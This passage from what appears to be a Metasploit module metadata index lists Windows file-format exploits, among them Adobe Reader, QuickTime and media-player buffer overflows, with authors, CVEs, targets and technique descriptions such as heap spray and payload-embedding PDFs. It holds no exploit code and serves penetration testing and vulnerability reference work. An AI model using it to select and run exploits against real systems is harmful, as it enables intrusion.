"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_geticon": {
"name": "Adobe Collab.getIcon() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_geticon",
"rank": 400,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\n crafted pdf that a contains malformed Collab.getIcon() call, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-0927",
"OSVDB-53647",
"ZDI-09-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_geticon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_illustrator_v14_eps": {
"name": "Adobe Illustrator CS4 v14.0.0",
"full_name": "exploit/windows/fileformat/adobe_illustrator_v14_eps",
"rank": 500,
"disclosure_date": "2009-12-03",
"type": "exploit",
"author": [
"pyrokinesis",
"dookie"
],
"description": "Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n overlong DSC Comment Buffer Overflow Exploit",
"references": [
"CVE-2009-4195",
"BID-37192",
"OSVDB-60632",
"EDB-10281"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_jbig2decode": {
"name": "Adobe JBIG2Decode Memory Corruption",
"full_name": "exploit/windows/fileformat/adobe_jbig2decode",
"rank": 400,
"disclosure_date": "2009-02-19",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"xort",
"redsand",
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.\n This module relies upon javascript for the heap spray.",
"references": [
"CVE-2009-0658",
"OSVDB-52073"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v9.0.0 (Windows XP SP3 English)",
"Adobe Reader v8.1.2 (Windows XP SP2 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_jbig2decode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_libtiff": {
"name": "Adobe Acrobat Bundled LibTIFF Integer Overflow",
"full_name": "exploit/windows/fileformat/adobe_libtiff",
"rank": 400,
"disclosure_date": "2010-02-16",
"type": "exploit",
"author": [
"Microsoft",
"villy <villys777@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions 8.0 through 8.2 and 9.0 through 9.3.",
"references": [
"CVE-2010-0188",
"BID-38195",
"OSVDB-62526",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html",
"URL-http://secunia.com/blog/76/",
"URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_media_newplayer": {
"name": "Adobe Doc.media.newPlayer Use After Free Vulnerability",
"full_name": "exploit/windows/fileformat/adobe_media_newplayer",
"rank": 400,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"unknown",
"hdm <x@hdm.io>",
"pusscat <pusscat@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n Professional versions up to and including 9.2.",
"references": [
"CVE-2009-4324",
"BID-37331",
"OSVDB-60980"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows English (JS Heap Spray)",
"Adobe Reader Windows German (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_media_newplayer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_pdf_embedded_exe": {
"name": "Adobe PDF Embedded EXE Social Engineering",
"full_name": "exploit/windows/fileformat/adobe_pdf_embedded_exe",
"rank": 600,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"Colin Ames <amesc@attackresearch.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.",
"references": [
"CVE-2010-1240",
"OSVDB-63667",
"URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/",
"URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/",
"URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_pdf_embedded_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_pdf_embedded_exe_nojs": {
"name": "Adobe PDF Escape EXE Social Engineering (No JavaScript)",
"full_name": "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs",
"rank": 600,
"disclosure_date": "2010-03-29",
"type": "exploit",
"author": [
"Jeremy Conway <jeremy@sudosecure.net>"
],
"description": "This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.",
"references": [
"CVE-2010-1240",
"OSVDB-63667",
"URL-http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/",
"URL-http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/",
"URL-http://blog.didierstevens.com/2010/03/29/escape-from-pdf/",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-15.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader <= v9.3.3 (Windows XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_pdf_embedded_exe_nojs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_reader_u3d": {
"name": "Adobe Reader U3D Memory Corruption Vulnerability",
"full_name": "exploit/windows/fileformat/adobe_reader_u3d",
"rank": 200,
"disclosure_date": "2011-12-06",
"type": "exploit",
"author": [
"Felipe Andres Manzano",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the U3D handling within\n versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.\n The vulnerability is due to the use of uninitialized memory.\n\n Arbitrary code execution is achieved by embedding specially crafted U3D\n data into a PDF document. A heap spray via JavaScript is used in order to\n ensure that the memory used by the invalid pointer issue is controlled.",
"references": [
"CVE-2011-2462",
"OSVDB-77529",
"BID-50922",
"URL-http://www.adobe.com/support/security/advisories/apsa11-04.html",
"URL-http://blog.9bplus.com/analyzing-cve-2011-2462",
"URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0",
"URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_reader_u3d",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_toolbutton": {
"name": "Adobe Reader ToolButton Use After Free",
"full_name": "exploit/windows/fileformat/adobe_toolbutton",
"rank": 300,
"disclosure_date": "2013-08-08",
"type": "exploit",
"author": [
"Soroush Dalili",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\n the cEnable callback can be used to early free the object memory. Later use of the object\n allows triggering the use after free condition. This module has been tested successfully\n on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in\n November, 2013.",
"references": [
"CVE-2013-3346",
"OSVDB-96745",
"ZDI-13-212",
"URL-http://www.adobe.com/support/security/bulletins/apsb13-15.html",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP / Adobe Reader 9/10/11"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_toolbutton.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_toolbutton",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_u3d_meshdecl": {
"name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",
"full_name": "exploit/windows/fileformat/adobe_u3d_meshdecl",
"rank": 400,
"disclosure_date": "2009-10-13",
"type": "exploit",
"author": [
"Felipe Andres Manzano <felipe.andres.manzano@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-3953",
"OSVDB-61690",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_u3d_meshdecl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_utilprintf": {
"name": "Adobe util.printf() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_utilprintf",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n entry, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2992",
"OSVDB-49520"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.2 (Windows XP SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_utilprintf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/allplayer_m3u_bof": {
"name": "ALLPlayer M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/allplayer_m3u_bof",
"rank": 300,
"disclosure_date": "2013-10-09",
"type": "exploit",
"author": [
"metacom",
"Mike Czumak",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n ALLPlayer 5.8.1, caused by a long string in a playlist entry.\n By persuading the victim to open a specially-crafted .M3U file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows 7 SP1.",
"references": [
"CVE-2013-7409",
"BID-62926",
"BID-63896",
"EDB-28855",
"EDB-29549",
"EDB-29798",
"EDB-32041",
"OSVDB-98283",
"URL-http://www.allplayer.org/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
" ALLPlayer 2.8.1 / Windows 7 SP1"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/allplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/altap_salamander_pdb": {
"name": "Altap Salamander 2.5 PE Viewer Buffer Overflow",
"full_name": "exploit/windows/fileformat/altap_salamander_pdb",
"rank": 400,
"disclosure_date": "2007-06-19",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in Altap Salamander <= v2.5.\n By creating a malicious file and convincing a user to view the file with\n the Portable Executable Viewer plugin within a vulnerable version of\n Salamander, the PDB file string is copied onto the stack and the\n SEH can be overwritten.",
"references": [
"CVE-2007-3314",
"BID-24557",
"OSVDB-37579",
"URL-http://vuln.sg/salamander25-en.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal Salamander 2.5"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/altap_salamander_pdb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aol_desktop_linktag": {
"name": "AOL Desktop 9.6 RTX Buffer Overflow",
"full_name": "exploit/windows/fileformat/aol_desktop_linktag",
"rank": 300,
"disclosure_date": "2011-01-31",
"type": "exploit",
"author": [
"sup3r",
"sickn3ss",
"sinn3r <sinn3r@metasploit.com>",
"mr_me <steventhomasseeley@gmail.com>",
"silent_dream"
],
"description": "This module exploits a vulnerability found in AOL Desktop 9.6's Tool\\rich.rct\n component. By supplying a long string of data in the hyperlink tag, rich.rct copies\n this data into a buffer using a strcpy function, which causes an overflow, and\n results arbitrary code execution.",
"references": [
"OSVDB-70741",
"EDB-16085"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AOL Desktop 9.6 on Windows XP SP3",
"AOL Desktop 9.6 on Windows XP SP3 - NX bypass",
"AOL Desktop 9.6 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/aol_desktop_linktag.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_desktop_linktag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aol_phobos_bof": {
"name": "AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",
"full_name": "exploit/windows/fileformat/aol_phobos_bof",
"rank": 200,
"disclosure_date": "2010-01-20",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n By setting an overly long value to 'Import()', an attacker can overrun a buffer\n and execute arbitrary code.\n\n NOTE: This ActiveX control is NOT marked safe for scripting or initialization.",
"references": [
"OSVDB-61964",
"EDB-11204",
"URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aol_phobos_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_pnsize": {
"name": "Apple QuickTime PICT PnSize Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_pnsize",
"rank": 400,
"disclosure_date": "2011-08-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2011-0257",
"OSVDB-74687",
"EDB-17777",
"BID-49144"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 with DEP bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_pnsize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_rdrf": {
"name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_rdrf",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Jason Kratzer",
"Tom Gallagher",
"Paul Bates",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.",
"references": [
"CVE-2013-1017",
"OSVDB-93625",
"BID-60097",
"URL-http://support.apple.com/kb/HT5770",
"ZDI-13-110"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7.7.0 - 7.7.3 on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_rdrf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/apple_quicktime_texml": {
"name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/apple_quicktime_texml",
"rank": 300,
"disclosure_date": "2012-05-15",
"type": "exploit",
"author": [
"Alexander Gavrun",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results the overflow.",
"references": [
"OSVDB-81934",
"CVE-2012-0663",
"BID-53571",
"ZDI-12-107",
"URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html",
"URL-http://support.apple.com/kb/HT1222"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"QuickTime 7.7.1 on Windows XP SP3",
"QuickTime 7.7.0 on Windows XP SP3",
"QuickTime 7.6.9 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/apple_quicktime_texml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audio_coder_m3u": {
"name": "AudioCoder .M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/audio_coder_m3u",
"rank": 300,
"disclosure_date": "2013-05-01",
"type": "exploit",
"author": [
"metacom",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2017-8870",
"OSVDB-92939",
"EDB-25141"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audio_coder_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audio_wkstn_pls": {
"name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow",
"full_name": "exploit/windows/fileformat/audio_wkstn_pls",
"rank": 400,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"germaya_x",
"dookie"
],
"description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2009-0476",
"OSVDB-55424",
"EDB-10353"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audio_wkstn_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audiotran_pls": {
"name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/audiotran_pls",
"rank": 400,
"disclosure_date": "2010-01-09",
"type": "exploit",
"author": [
"Sebastien Duquette",
"dookie"
],
"description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.",
"references": [
"CVE-2009-0476",
"OSVDB-55424",
"EDB-11079"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/audiotran_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audiotran_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/audiotran_pls_1424": {
"name": "Audiotran PLS File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/audiotran_pls_1424",
"rank": 400,
"disclosure_date": "2010-09-09",
"type": "exploit",
"author": [
"Philip OKeefe"
],
"description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.",
"references": [
"EDB-14961"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/audiotran_pls_1424",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/aviosoft_plf_buf": {
"name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/aviosoft_plf_buf",
"rank": 400,
"disclosure_date": "2011-11-09",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.",
"references": [
"OSVDB-77043",
"EDB-18096"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Aviosoft DTV Player 1.0.1.2"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/aviosoft_plf_buf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/bacnet_csv": {
"name": "BACnet OPC Client Buffer Overflow",
"full_name": "exploit/windows/fileformat/bacnet_csv",
"rank": 400,
"disclosure_date": "2010-09-16",
"type": "exploit",
"author": [
"Jeremy Brown",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.",
"references": [
"CVE-2010-4740",
"OSVDB-68096",
"BID-43289",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English",
"Windows 2000 SP4 English"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/bacnet_csv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/bacnet_csv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/beetel_netconfig_ini_bof": {
"name": "Beetel Connection Manager NetConfig.ini Buffer Overflow",
"full_name": "exploit/windows/fileformat/beetel_netconfig_ini_bof",
"rank": 300,
"disclosure_date": "2013-10-12",
"type": "exploit",
"author": [
"metacom",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n SP3 and Windows 7 SP1.",
"references": [
"OSVDB-98714",
"EDB-28969"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/blazedvd_hdtv_bof": {
"name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",
"full_name": "exploit/windows/fileformat/blazedvd_hdtv_bof",
"rank": 300,
"disclosure_date": "2012-04-03",
"type": "exploit",
"author": [
"b33f",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.",
"references": [
"OSVDB-80896",
"EDB-18693",
"EDB-22931"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BlazeVideo HDTV Player Pro v6.6.0.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
